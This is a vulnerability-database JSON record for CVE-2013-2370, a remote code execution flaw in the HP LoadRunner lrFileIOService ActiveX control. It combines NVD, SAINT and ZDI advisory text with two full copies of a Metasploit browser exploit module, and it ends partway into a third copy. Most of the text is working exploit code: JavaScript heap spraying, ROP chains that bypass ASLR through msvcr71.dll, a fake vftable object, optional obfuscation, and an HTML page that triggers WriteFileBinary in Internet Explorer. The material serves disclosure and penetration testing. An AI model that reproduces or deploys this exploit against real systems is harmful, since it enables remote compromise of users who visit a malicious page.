{"cve": [{"lastseen": "2021-02-02T06:06:51", "description": "Unspecified vulnerability in HP LoadRunner before 11.52 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1671.", "edition": 7, "cvss3": {}, "published": "2013-07-29T13:59:00", "title": "CVE-2013-2370", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2370"], "modified": "2019-10-09T23:07:00", "cpe": ["cpe:/a:hp:loadrunner:9.50.0", "cpe:/a:hp:loadrunner:9.52", "cpe:/a:hp:loadrunner:11.51", "cpe:/a:hp:loadrunner:9.51", "cpe:/a:hp:loadrunner:9.0.0", "cpe:/a:hp:loadrunner:11.50", "cpe:/a:hp:loadrunner:11.0.0.0"], "id": "CVE-2013-2370", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2370", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:hp:loadrunner:9.51:*:*:*:*:*:*:*", "cpe:2.3:a:hp:loadrunner:9.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:hp:loadrunner:9.52:*:*:*:*:*:*:*", "cpe:2.3:a:hp:loadrunner:11.50:*:*:*:*:*:*:*", "cpe:2.3:a:hp:loadrunner:11.51:*:*:*:*:*:*:*", "cpe:2.3:a:hp:loadrunner:11.0.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:hp:loadrunner:9.50.0:*:*:*:*:*:*:*"]}], "saint": [{"lastseen": "2016-10-03T15:01:54", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2370"], "description": "Added: 08/29/2013 \nCVE: [CVE-2013-2370](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2370>) \nBID: [61441](<http://www.securityfocus.com/bid/61441>) \nOSVDB: [95640](<http://www.osvdb.org/95640>) \n\n\n### Background\n\n[HP 
LoadRunner](<http://www8.hp.com/us/en/software-solutions/software.html?compURI=1175451#.Uh-TiG2ZZdB>) is a software performance testing solution. HP LoadRunner includes the `**lrFileIOService**` ActiveX control. \n\n### Problem\n\nHP LoadRunner before 11.52 is vulnerable to remote code execution. The `**lrFileIOService**` ActiveX control exposes the `**WriteFileBinary**` method which accepts a parameter named data without validating the value. A remote attacker who persuades a vulnerable user to visit a malicious web page could execute arbitrary code in the context of the user. \n\n### Resolution\n\nUpgrade to HP LoadRunner 11.52 or higher as indicated in HP Security Bulletin [HPSBGN02905 SSRT101083](<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03862772>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-13-182/> \n\n\n### Limitations\n\nThis exploit was tested against HP LoadRunner 11.50 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\nThe user must open the exploit in Internet Explorer 8 or 9 on the target. 
\n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2013-08-29T00:00:00", "published": "2013-08-29T00:00:00", "id": "SAINT:F14F324A69B9FCF247F0CCD475E84FD4", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/hp_loadrunner_lrfileioservice_writefilebinary_data", "type": "saint", "title": "HP LoadRunner lrFileIOService ActiveX Control WriteFileBinary Input Validation Error", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T19:19:26", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2370"], "edition": 2, "description": "Added: 08/29/2013 \nCVE: [CVE-2013-2370](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2370>) \nBID: [61441](<http://www.securityfocus.com/bid/61441>) \nOSVDB: [95640](<http://www.osvdb.org/95640>) \n\n\n### Background\n\n[HP LoadRunner](<http://www8.hp.com/us/en/software-solutions/software.html?compURI=1175451#.Uh-TiG2ZZdB>) is a software performance testing solution. HP LoadRunner includes the `**lrFileIOService**` ActiveX control. \n\n### Problem\n\nHP LoadRunner before 11.52 is vulnerable to remote code execution. The `**lrFileIOService**` ActiveX control exposes the `**WriteFileBinary**` method which accepts a parameter named data without validating the value. A remote attacker who persuades a vulnerable user to visit a malicious web page could execute arbitrary code in the context of the user. \n\n### Resolution\n\nUpgrade to HP LoadRunner 11.52 or higher as indicated in HP Security Bulletin [HPSBGN02905 SSRT101083](<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03862772>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-13-182/> \n\n\n### Limitations\n\nThis exploit was tested against HP LoadRunner 11.50 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\nThe user must open the exploit in Internet Explorer 8 or 9 on the target. 
\n\n### Platforms\n\nWindows \n \n\n", "modified": "2013-08-29T00:00:00", "published": "2013-08-29T00:00:00", "id": "SAINT:63864CA83504F15CC45269FD1FD04E8C", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/hp_loadrunner_lrfileioservice_writefilebinary_data", "type": "saint", "title": "HP LoadRunner lrFileIOService ActiveX Control WriteFileBinary Input Validation Error", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-06-04T23:19:36", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2370"], "description": "Added: 08/29/2013 \nCVE: [CVE-2013-2370](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2370>) \nBID: [61441](<http://www.securityfocus.com/bid/61441>) \nOSVDB: [95640](<http://www.osvdb.org/95640>) \n\n\n### Background\n\n[HP LoadRunner](<http://www8.hp.com/us/en/software-solutions/software.html?compURI=1175451#.Uh-TiG2ZZdB>) is a software performance testing solution. HP LoadRunner includes the `**lrFileIOService**` ActiveX control. \n\n### Problem\n\nHP LoadRunner before 11.52 is vulnerable to remote code execution. The `**lrFileIOService**` ActiveX control exposes the `**WriteFileBinary**` method which accepts a parameter named data without validating the value. A remote attacker who persuades a vulnerable user to visit a malicious web page could execute arbitrary code in the context of the user. \n\n### Resolution\n\nUpgrade to HP LoadRunner 11.52 or higher as indicated in HP Security Bulletin [HPSBGN02905 SSRT101083](<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03862772>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-13-182/> \n\n\n### Limitations\n\nThis exploit was tested against HP LoadRunner 11.50 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\nThe user must open the exploit in Internet Explorer 8 or 9 on the target. 
\n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2013-08-29T00:00:00", "published": "2013-08-29T00:00:00", "id": "SAINT:5404BF955A4F77C98E722EE7EC57C9FE", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/hp_loadrunner_lrfileioservice_writefilebinary_data", "title": "HP LoadRunner lrFileIOService ActiveX Control WriteFileBinary Input Validation Error", "type": "saint", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-02-18T01:25:53", "description": "This Metasploit module exploits a vulnerability on the lrFileIOService ActiveX, as installed with HP LoadRunner 11.50. The vulnerability exists in the WriteFileBinary method where user provided data is used as a memory pointer. This Metasploit module has been tested successfully on IE6-IE9 on Windows XP, Vista and 7, using the LrWebIERREWrapper.dll 11.50.2216.0. In order to bypass ASLR the no aslr compatible module msvcr71.dll is used. This one is installed with HP LoadRunner.", "edition": 2, "published": "2013-08-29T00:00:00", "type": "zdt", "title": "HP LoadRunner lrFileIOService ActiveX Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2370"], "modified": "2013-08-29T00:00:00", "id": "1337DAY-ID-21178", "href": "https://0day.today/exploit/description/21178", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n include Msf::Exploit::RopDb\r\n include Msf::Exploit::Remote::BrowserAutopwn\r\n \r\n autopwn_info({\r\n :ua_name => HttpClients::IE,\r\n :ua_minver => \"6.0\",\r\n :ua_maxver => \"9.0\",\r\n :javascript => true,\r\n :os_name => OperatingSystems::WINDOWS,\r\n :rank => Rank,\r\n :classid => \"{8D9E2CC7-D94B-4977-8510-FB49C361A139}\",\r\n :method => \"WriteFileBinary\"\r\n })\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"HP LoadRunner lrFileIOService ActiveX Remote Code Execution\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability on the lrFileIOService ActiveX, as installed\r\n with HP LoadRunner 11.50. The vulnerability exists in the WriteFileBinary method\r\n where user provided data is used as a memory pointer. This module has been tested\r\n successfully on IE6-IE9 on Windows XP, Vista and 7, using the LrWebIERREWrapper.dll\r\n 11.50.2216.0. In order to bypass ASLR the no aslr compatible module msvcr71.dll is\r\n used. 
This one is installed with HP LoadRunner.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'rgod <rgod[at]autistici.org>', # Vulnerability discovery\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-2370' ],\r\n [ 'OSVDB', '95640' ],\r\n [ 'BID', '61441'],\r\n [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-182/' ],\r\n [ 'URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03862772' ]\r\n ],\r\n 'Payload' =>\r\n {\r\n 'Space' => 1024,\r\n 'DisableNops' => true,\r\n 'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'PrependMigrate' => true\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n # LrWebIERREWrapper.dll 11.50.2216.0\r\n [ 'Automatic', {} ],\r\n [ 'IE 7 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5F4' } ],\r\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :jre, 'Offset' => '0x5f4' } ],\r\n [ 'IE 7 on Windows Vista', { 'Rop' => nil, 'Offset' => '0x5f4' } ],\r\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => '0x5f4' } ],\r\n [ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x5f4' } ],\r\n [ 'IE 9 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x5fe' } ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Jul 24 2013\",\r\n 'DefaultTarget' => 0))\r\n \r\n register_options(\r\n [\r\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\r\n ], self.class)\r\n \r\n end\r\n \r\n def get_target(agent)\r\n #If the user is already specified by the user, we'll just use that\r\n return target if target.name != 'Automatic'\r\n \r\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\r\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\r\n \r\n ie_name = \"IE #{ie}\"\r\n \r\n case nt\r\n when '5.1'\r\n os_name = 'Windows XP SP3'\r\n when '6.0'\r\n os_name = 'Windows Vista'\r\n when '6.1'\r\n os_name = 'Windows 7'\r\n end\r\n \r\n 
targets.each do |t|\r\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\r\n print_status(\"Target selected as: #{t.name}\")\r\n return t\r\n end\r\n end\r\n \r\n return nil\r\n end\r\n \r\n def ie_heap_spray(my_target, p)\r\n js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))\r\n js_nops = Rex::Text.to_unescape(\"\\x0c\"*4, Rex::Arch.endian(target.arch))\r\n js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))\r\n \r\n # Land the payload at 0x0c0c0c0c\r\n case my_target\r\n when targets[6]\r\n # IE 9 on Windows 7\r\n js = %Q|\r\n function randomblock(blocksize)\r\n {\r\n var theblock = \"\";\r\n for (var i = 0; i < blocksize; i++)\r\n {\r\n theblock += Math.floor(Math.random()*90)+10;\r\n }\r\n return theblock;\r\n }\r\n \r\n function tounescape(block)\r\n {\r\n var blocklen = block.length;\r\n var unescapestr = \"\";\r\n for (var i = 0; i < blocklen-1; i=i+4)\r\n {\r\n unescapestr += \"%u\" + block.substring(i,i+4);\r\n }\r\n return unescapestr;\r\n }\r\n \r\n var heap_obj = new heapLib.ie(0x10000);\r\n var code = unescape(\"#{js_code}\");\r\n var nops = unescape(\"#{js_random_nops}\");\r\n while (nops.length < 0x80000) nops += nops;\r\n var offset_length = #{my_target['Offset']};\r\n for (var i=0; i < 0x1000; i++) {\r\n var padding = unescape(tounescape(randomblock(0x1000)));\r\n while (padding.length < 0x1000) padding+= padding;\r\n var junk_offset = padding.substring(0, offset_length);\r\n var single_sprayblock = junk_offset + code + nops.substring(0, 0x800 - code.length - junk_offset.length);\r\n while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock;\r\n sprayblock = single_sprayblock.substring(0, (0x40000-6)/2);\r\n heap_obj.alloc(sprayblock);\r\n }\r\n |\r\n \r\n else\r\n # For IE 6, 7, 8\r\n js = %Q|\r\n var heap_obj = new heapLib.ie(0x20000);\r\n var code = unescape(\"#{js_code}\");\r\n var nops = unescape(\"#{js_nops}\");\r\n while 
(nops.length < 0x80000) nops += nops;\r\n var offset = nops.substring(0, #{my_target['Offset']});\r\n var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);\r\n while (shellcode.length < 0x40000) shellcode += shellcode;\r\n var block = shellcode.substring(0, (0x80000-6)/2);\r\n heap_obj.gc();\r\n for (var i=1; i < 0x300; i++) {\r\n heap_obj.alloc(block);\r\n }\r\n |\r\n \r\n end\r\n \r\n js = heaplib(js, {:noobfu => true})\r\n \r\n if datastore['OBFUSCATE']\r\n js = ::Rex::Exploitation::JSObfu.new(js)\r\n js.obfuscate\r\n end\r\n \r\n return js\r\n end\r\n \r\n def get_payload(t, cli)\r\n code = payload.encoded\r\n \r\n fake_object = [\r\n 0x0c0c0c0c, # fake vftable pointer\r\n 0x0c0c0c14 # function pointer\r\n ].pack(\"V*\")\r\n \r\n # No rop. Just return the payload.\r\n return fake_object + code if t['Rop'].nil?\r\n \r\n # Both ROP chains generated by mona.py - See corelan.be\r\n case t['Rop']\r\n when :jre\r\n print_status(\"Using msvcr71.dll ROP\")\r\n fake_object = [\r\n 0x0c0c0c0c, # fake vftable pointer\r\n 0x7c342643 # xchg eax,esp # pop edi # add byte ptr ds:[eax],al # pop ecx # retn\r\n ].pack(\"V*\")\r\n rop_payload = fake_object + generate_rop_payload('java', code)#, {'pivot'=>stack_pivot})\r\n end\r\n \r\n return rop_payload\r\n end\r\n \r\n def load_exploit_html(my_target, cli)\r\n p = get_payload(my_target, cli)\r\n js = ie_heap_spray(my_target, p)\r\n object_id = rand_text_alpha(rand(10) + 8)\r\n \r\n html = %Q|\r\n <html>\r\n <head>\r\n <script>\r\n #{js}\r\n </script>\r\n </head>\r\n <body>\r\n <object classid='clsid:8D9E2CC7-D94B-4977-8510-FB49C361A139' id='#{object_id}'></object>\r\n <script language='javascript'>\r\n #{object_id}.WriteFileBinary(\"#{rand_text_alpha(4+ rand(4))}\", 0x0c0c0c0c);\r\n </script>\r\n </body>\r\n </html>\r\n |\r\n \r\n return html\r\n end\r\n \r\n def on_request_uri(cli, request)\r\n agent = request.headers['User-Agent']\r\n uri = request.uri\r\n print_status(\"Requesting: #{uri}\")\r\n 
\r\n my_target = get_target(agent)\r\n # Avoid the attack if no suitable target found\r\n if my_target.nil?\r\n print_error(\"Browser not supported, sending 404: #{agent}\")\r\n send_not_found(cli)\r\n return\r\n end\r\n \r\n html = load_exploit_html(my_target, cli)\r\n html = html.gsub(/^\\t\\t/, '')\r\n print_status(\"Sending HTML...\")\r\n send_response(cli, html, {'Content-Type'=>'text/html'})\r\n end\r\n \r\nend\n\n# 0day.today [2018-02-17] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/21178"}], "zdi": [{"lastseen": "2020-06-22T11:42:21", "bulletinFamily": "info", "cvelist": ["CVE-2013-2370"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of HP LoadRunner. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the lrFileIOService ActiveX control. The control exposes the WriteFileBinary method which accepts a parameter named data that it uses as a valid pointer. By specifying invalid values an attacker can force the application to jump to a controlled location in memory. This can be exploited to execute remote code under the context of the user running the web browser.", "modified": "2013-06-22T00:00:00", "published": "2013-07-26T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-13-182/", "id": "ZDI-13-182", "title": "Hewlett-Packard LoadRunner lrFileIOService ActiveX Control WriteFileBinary Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-03T07:05:32", "description": "HP LoadRunner lrFileIOService ActiveX Remote Code Execution. CVE-2013-2370. 
Remote exploit for windows platform", "published": "2013-08-29T00:00:00", "type": "exploitdb", "title": "HP LoadRunner lrFileIOService ActiveX Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2370"], "modified": "2013-08-29T00:00:00", "id": "EDB-ID:27939", "href": "https://www.exploit-db.com/exploits/27939/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n include Msf::Exploit::RopDb\r\n include Msf::Exploit::Remote::BrowserAutopwn\r\n\r\n autopwn_info({\r\n :ua_name => HttpClients::IE,\r\n :ua_minver => \"6.0\",\r\n :ua_maxver => \"9.0\",\r\n :javascript => true,\r\n :os_name => OperatingSystems::WINDOWS,\r\n :rank => Rank,\r\n :classid => \"{8D9E2CC7-D94B-4977-8510-FB49C361A139}\",\r\n :method => \"WriteFileBinary\"\r\n })\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"HP LoadRunner lrFileIOService ActiveX Remote Code Execution\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability on the lrFileIOService ActiveX, as installed\r\n with HP LoadRunner 11.50. The vulnerability exists in the WriteFileBinary method\r\n where user provided data is used as a memory pointer. This module has been tested\r\n successfully on IE6-IE9 on Windows XP, Vista and 7, using the LrWebIERREWrapper.dll\r\n 11.50.2216.0. In order to bypass ASLR the no aslr compatible module msvcr71.dll is\r\n used. 
This one is installed with HP LoadRunner.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'rgod <rgod[at]autistici.org>', # Vulnerability discovery\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-2370' ],\r\n [ 'OSVDB', '95640' ],\r\n [ 'BID', '61441'],\r\n [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-182/' ],\r\n [ 'URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03862772' ]\r\n ],\r\n 'Payload' =>\r\n {\r\n 'Space' => 1024,\r\n 'DisableNops' => true,\r\n 'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'PrependMigrate' => true\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n # LrWebIERREWrapper.dll 11.50.2216.0\r\n [ 'Automatic', {} ],\r\n [ 'IE 7 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5F4' } ],\r\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :jre, 'Offset' => '0x5f4' } ],\r\n [ 'IE 7 on Windows Vista', { 'Rop' => nil, 'Offset' => '0x5f4' } ],\r\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => '0x5f4' } ],\r\n [ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x5f4' } ],\r\n [ 'IE 9 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x5fe' } ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Jul 24 2013\",\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\r\n ], self.class)\r\n\r\n end\r\n\r\n def get_target(agent)\r\n #If the user is already specified by the user, we'll just use that\r\n return target if target.name != 'Automatic'\r\n\r\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\r\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\r\n\r\n ie_name = \"IE #{ie}\"\r\n\r\n case nt\r\n when '5.1'\r\n os_name = 'Windows XP SP3'\r\n when '6.0'\r\n os_name = 'Windows Vista'\r\n when '6.1'\r\n os_name = 'Windows 7'\r\n end\r\n\r\n targets.each 
do |t|\r\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\r\n print_status(\"Target selected as: #{t.name}\")\r\n return t\r\n end\r\n end\r\n\r\n return nil\r\n end\r\n\r\n def ie_heap_spray(my_target, p)\r\n js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))\r\n js_nops = Rex::Text.to_unescape(\"\\x0c\"*4, Rex::Arch.endian(target.arch))\r\n js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))\r\n\r\n # Land the payload at 0x0c0c0c0c\r\n case my_target\r\n when targets[6]\r\n # IE 9 on Windows 7\r\n js = %Q|\r\n function randomblock(blocksize)\r\n {\r\n var theblock = \"\";\r\n for (var i = 0; i < blocksize; i++)\r\n {\r\n theblock += Math.floor(Math.random()*90)+10;\r\n }\r\n return theblock;\r\n }\r\n\r\n function tounescape(block)\r\n {\r\n var blocklen = block.length;\r\n var unescapestr = \"\";\r\n for (var i = 0; i < blocklen-1; i=i+4)\r\n {\r\n unescapestr += \"%u\" + block.substring(i,i+4);\r\n }\r\n return unescapestr;\r\n }\r\n\r\n var heap_obj = new heapLib.ie(0x10000);\r\n var code = unescape(\"#{js_code}\");\r\n var nops = unescape(\"#{js_random_nops}\");\r\n while (nops.length < 0x80000) nops += nops;\r\n var offset_length = #{my_target['Offset']};\r\n for (var i=0; i < 0x1000; i++) {\r\n var padding = unescape(tounescape(randomblock(0x1000)));\r\n while (padding.length < 0x1000) padding+= padding;\r\n var junk_offset = padding.substring(0, offset_length);\r\n var single_sprayblock = junk_offset + code + nops.substring(0, 0x800 - code.length - junk_offset.length);\r\n while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock;\r\n sprayblock = single_sprayblock.substring(0, (0x40000-6)/2);\r\n heap_obj.alloc(sprayblock);\r\n }\r\n |\r\n\r\n else\r\n # For IE 6, 7, 8\r\n js = %Q|\r\n var heap_obj = new heapLib.ie(0x20000);\r\n var code = unescape(\"#{js_code}\");\r\n var nops = unescape(\"#{js_nops}\");\r\n while (nops.length < 0x80000) 
nops += nops;\r\n var offset = nops.substring(0, #{my_target['Offset']});\r\n var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);\r\n while (shellcode.length < 0x40000) shellcode += shellcode;\r\n var block = shellcode.substring(0, (0x80000-6)/2);\r\n heap_obj.gc();\r\n for (var i=1; i < 0x300; i++) {\r\n heap_obj.alloc(block);\r\n }\r\n |\r\n\r\n end\r\n\r\n js = heaplib(js, {:noobfu => true})\r\n\r\n if datastore['OBFUSCATE']\r\n js = ::Rex::Exploitation::JSObfu.new(js)\r\n js.obfuscate\r\n end\r\n\r\n return js\r\n end\r\n\r\n def get_payload(t, cli)\r\n code = payload.encoded\r\n\r\n fake_object = [\r\n 0x0c0c0c0c, # fake vftable pointer\r\n 0x0c0c0c14 # function pointer\r\n ].pack(\"V*\")\r\n\r\n # No rop. Just return the payload.\r\n return fake_object + code if t['Rop'].nil?\r\n\r\n # Both ROP chains generated by mona.py - See corelan.be\r\n case t['Rop']\r\n when :jre\r\n print_status(\"Using msvcr71.dll ROP\")\r\n fake_object = [\r\n 0x0c0c0c0c, # fake vftable pointer\r\n 0x7c342643 # xchg eax,esp # pop edi # add byte ptr ds:[eax],al # pop ecx # retn\r\n ].pack(\"V*\")\r\n rop_payload = fake_object + generate_rop_payload('java', code)#, {'pivot'=>stack_pivot})\r\n end\r\n\r\n return rop_payload\r\n end\r\n\r\n def load_exploit_html(my_target, cli)\r\n p = get_payload(my_target, cli)\r\n js = ie_heap_spray(my_target, p)\r\n object_id = rand_text_alpha(rand(10) + 8)\r\n\r\n html = %Q|\r\n <html>\r\n <head>\r\n <script>\r\n #{js}\r\n </script>\r\n </head>\r\n <body>\r\n <object classid='clsid:8D9E2CC7-D94B-4977-8510-FB49C361A139' id='#{object_id}'></object>\r\n <script language='javascript'>\r\n #{object_id}.WriteFileBinary(\"#{rand_text_alpha(4+ rand(4))}\", 0x0c0c0c0c);\r\n </script>\r\n </body>\r\n </html>\r\n |\r\n\r\n return html\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n agent = request.headers['User-Agent']\r\n uri = request.uri\r\n print_status(\"Requesting: #{uri}\")\r\n\r\n my_target = get_target(agent)\r\n 
# Avoid the attack if no suitable target found\r\n if my_target.nil?\r\n print_error(\"Browser not supported, sending 404: #{agent}\")\r\n send_not_found(cli)\r\n return\r\n end\r\n\r\n html = load_exploit_html(my_target, cli)\r\n html = html.gsub(/^\\t\\t/, '')\r\n print_status(\"Sending HTML...\")\r\n send_response(cli, html, {'Content-Type'=>'text/html'})\r\n end\r\n\r\nend", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/27939/"}], "metasploit": [{"lastseen": "2020-10-12T22:51:43", "description": "This module exploits a vulnerability on the lrFileIOService ActiveX, as installed with HP LoadRunner 11.50. The vulnerability exists in the WriteFileBinary method where user provided data is used as a memory pointer. This module has been tested successfully on IE6-IE9 on Windows XP, Vista and 7, using the LrWebIERREWrapper.dll 11.50.2216.0. In order to bypass ASLR the no aslr compatible module msvcr71.dll is used. 
This one is installed with HP LoadRunner.\n", "published": "2013-08-26T04:07:08", "type": "metasploit", "title": "HP LoadRunner lrFileIOService ActiveX Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2370"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/HP_LOADRUNNER_WRITEFILEBINARY", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n #include Msf::Exploit::Remote::BrowserAutopwn\n #\n #autopwn_info({\n # :ua_name => HttpClients::IE,\n # :ua_minver => \"6.0\",\n # :ua_maxver => \"9.0\",\n # :javascript => true,\n # :os_name => OperatingSystems::Match::WINDOWS,\n # :rank => Rank,\n # :classid => \"{8D9E2CC7-D94B-4977-8510-FB49C361A139}\",\n # :method => \"WriteFileBinary\"\n #})\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"HP LoadRunner lrFileIOService ActiveX Remote Code Execution\",\n 'Description' => %q{\n This module exploits a vulnerability on the lrFileIOService ActiveX, as installed\n with HP LoadRunner 11.50. The vulnerability exists in the WriteFileBinary method\n where user provided data is used as a memory pointer. This module has been tested\n successfully on IE6-IE9 on Windows XP, Vista and 7, using the LrWebIERREWrapper.dll\n 11.50.2216.0. In order to bypass ASLR the no aslr compatible module msvcr71.dll is\n used. 
